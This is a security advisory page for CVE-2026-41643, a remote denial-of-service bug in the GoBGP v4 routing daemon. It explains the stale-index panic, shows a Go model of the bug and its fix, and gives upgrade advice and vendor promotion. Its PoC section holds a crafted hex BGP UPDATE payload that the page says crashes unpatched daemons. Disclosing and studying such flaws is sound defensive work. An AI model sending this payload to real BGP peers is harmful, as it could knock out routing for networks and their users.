CVE-2026-41643

CVE-2026-41643 is a high-severity security vulnerability in github.com/osrg/gobgp/v4 (go), affecting versions <= 4.2.0. It is fixed in 4.3.0.

Summary

A remote Denial of Service (DoS) vulnerability exists in GoBGP where a malformed BGP UPDATE message can trigger a runtime error: index out of range panic. This occurs during the processing of 4-byte AS attributes when the message structure causes an internal slice index shift that is not properly handled.

Details

The vulnerability is located in internal/pkg/table/message.go within the UpdatePathAttrs4ByteAs function.

When GoBGP processes a BGP UPDATE message containing both an AS_PATH and an AS4_PATH attribute, it attempts to merge or validate them to support 4-byte AS numbers. If the attributes are ordered such that AS4_PATH (Type 17) appears before AS_PATH (Type 2), and the AS4_PATH is deemed invalid/malformed, the code attempts to remove the AS4_PATH attribute from the msg.PathAttributes slice.
It appears the crash happens due to an index shift in msg.PathAttributes:

// GoBGP v4.2.0
// Line 112: If AS4_PATH precedes AS_PATH, the deletion causes all subsequent attributes to shift left.
msg.PathAttributes = append(msg.PathAttributes[:as4AttrPos], msg.PathAttributes[as4AttrPos+1:]...)

// Line 206: The stale asAttrPos index is used here.
// The function continues to use the stale index (asAttrPos) to update the AS_PATH. Since the slice length has decreased, accessing the old index leads to a panic.
msg.PathAttributes[asAttrPos] = bgp.NewPathAttributeAsPath(newIntfParams)

This deletion causes all subsequent attributes in the slice to shift left by one position. However, the function continues to use the original asAttrPos index (calculated before the deletion) to access or modify the AS_PATH attribute later at Line 206. Because the slice is now shorter, the "stale" index points out of bounds, triggering a panic and crashing the entire GoBGP process.
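To make the stale-index pattern concrete, the following Go model is an added illustration (not GoBGP's code): it uses a simplified attribute slice with the advisory's ordering (AS4_PATH before AS_PATH), returns the pre-deletion index the way the vulnerable path does, and beside it the corrected form that shifts the AS_PATH index left once the preceding element is removed. The pathAttr type, findAttr, dropAs4Path and inBounds are assumed helper names for this example only.

```go
package main

import "fmt"

// Minimal stand-in for a BGP path attribute (illustrative model, not GoBGP's own type).
type pathAttr struct{ typeCode uint8 }

const (
	typeAsPath  = 2  // AS_PATH
	typeAs4Path = 17 // AS4_PATH
)
// findAttr returns the position of the first attribute with the given type code, or -1.
func findAttr(attrs []pathAttr, typeCode uint8) int {
	for i, a := range attrs {
		if a.typeCode == typeCode {
			return i
		}
	}
	return -1
}
// dropAs4Path removes AS4_PATH and returns the new slice plus the index of AS_PATH.
// fixIndex=false keeps the index captured before the deletion (the stale value the
// advisory describes); fixIndex=true shifts it left when the removed element preceded it.
func dropAs4Path(attrs []pathAttr, fixIndex bool) ([]pathAttr, int) {
	asAttrPos := findAttr(attrs, typeAsPath)
	as4AttrPos := findAttr(attrs, typeAs4Path)
	if as4AttrPos < 0 {
		return attrs, asAttrPos
	}
	// Full slice expression caps capacity so append copies instead of overwriting attrs in place.
	out := append(attrs[:as4AttrPos:as4AttrPos], attrs[as4AttrPos+1:]...)
	if fixIndex && asAttrPos > as4AttrPos {
		asAttrPos-- // everything after the deleted element moved left by one
	}
	return out, asAttrPos
}

// inBounds reports whether idx can index attrs without an index-out-of-range panic.
func inBounds(attrs []pathAttr, idx int) bool {
	return idx >= 0 && idx < len(attrs)
}

func main() {
	// Constructed input mirroring the advisory's ordering: AS4_PATH (17) before AS_PATH (2).
	msg := []pathAttr{{typeAs4Path}, {typeAsPath}}
	stale, i := dropAs4Path(msg, false)
	fmt.Printf("stale index %d, length %d, safe=%v\n", i, len(stale), inBounds(stale, i))
	fixed, j := dropAs4Path(msg, true)
	fmt.Printf("fixed index %d, length %d, safe=%v\n", j, len(fixed), inBounds(fixed, j))
}
```

The stale case yields index 1 against a slice of length 1, which is exactly the combination behind the panic message quoted in the PoC; the corrected case lands on index 0, the surviving AS_PATH entry.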

PoC

Environment: GoBGP version 4.2.0
Configuration: Passive peering enabled.
Reproduction Steps:
  1. Configure GoBGP with a neighbor (e.g., 192.168.31.195).
  2. Send a specially crafted BGP UPDATE hex payload:

ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
00 22 02
00 00                  # Withdrawn Routes Length
00 0b                  # Total Path Attribute Length
40 11 01 02            # AS4_PATH (Type 17, Len 1, Val 02) - Triggers the bug
40 02 04 ff ff de ad   # AS_PATH (Type 2, Len 4)

The GoBGP process will immediately crash with: panic: runtime error: index out of range [1] with length 1.

Impact

Vulnerability Type: Remote Denial of Service (DoS).
Impacted Users: Any GoBGP deployment (v4.2.0 and earlier) that accepts BGP UPDATE messages from peers. Since this crash occurs in the FSM (Finite State Machine) handling loop, a single malicious peer or a malformed route propagated through a transit provider can consistently crash the BGP daemon, leading to a complete loss of routing capabilities.

CVE-2026-41643 has a CVSS score of 7.5 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (4.3.0); upgrading removes the vulnerable code path.

Affected versions

github.com/osrg/gobgp/v4 (<= 4.2.0)

Security releases

github.com/osrg/gobgp/v4 → 4.3.0 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Upgrade github.com/osrg/gobgp/v4 to 4.3.0 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-41643? CVE-2026-41643 is a high-severity security vulnerability in github.com/osrg/gobgp/v4 (go), affecting versions <= 4.2.0. It is fixed in 4.3.0.
  2. How severe is CVE-2026-41643? CVE-2026-41643 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/osrg/gobgp/v4 are affected by CVE-2026-41643? github.com/osrg/gobgp/v4 (go) versions <= 4.2.0 are affected.
  4. Is there a fix for CVE-2026-41643? Yes. CVE-2026-41643 is fixed in 4.3.0. Upgrade to this version or later.
  5. Is CVE-2026-41643 exploitable, and should I be worried? Whether CVE-2026-41643 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-41643 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-41643? Upgrade github.com/osrg/gobgp/v4 to 4.3.0 or later.

Other vulnerabilities in github.com/osrg/gobgp/v4

CVE-2026-42285, CVE-2026-37461, CVE-2026-7734, CVE-2026-41643, CVE-2026-41642
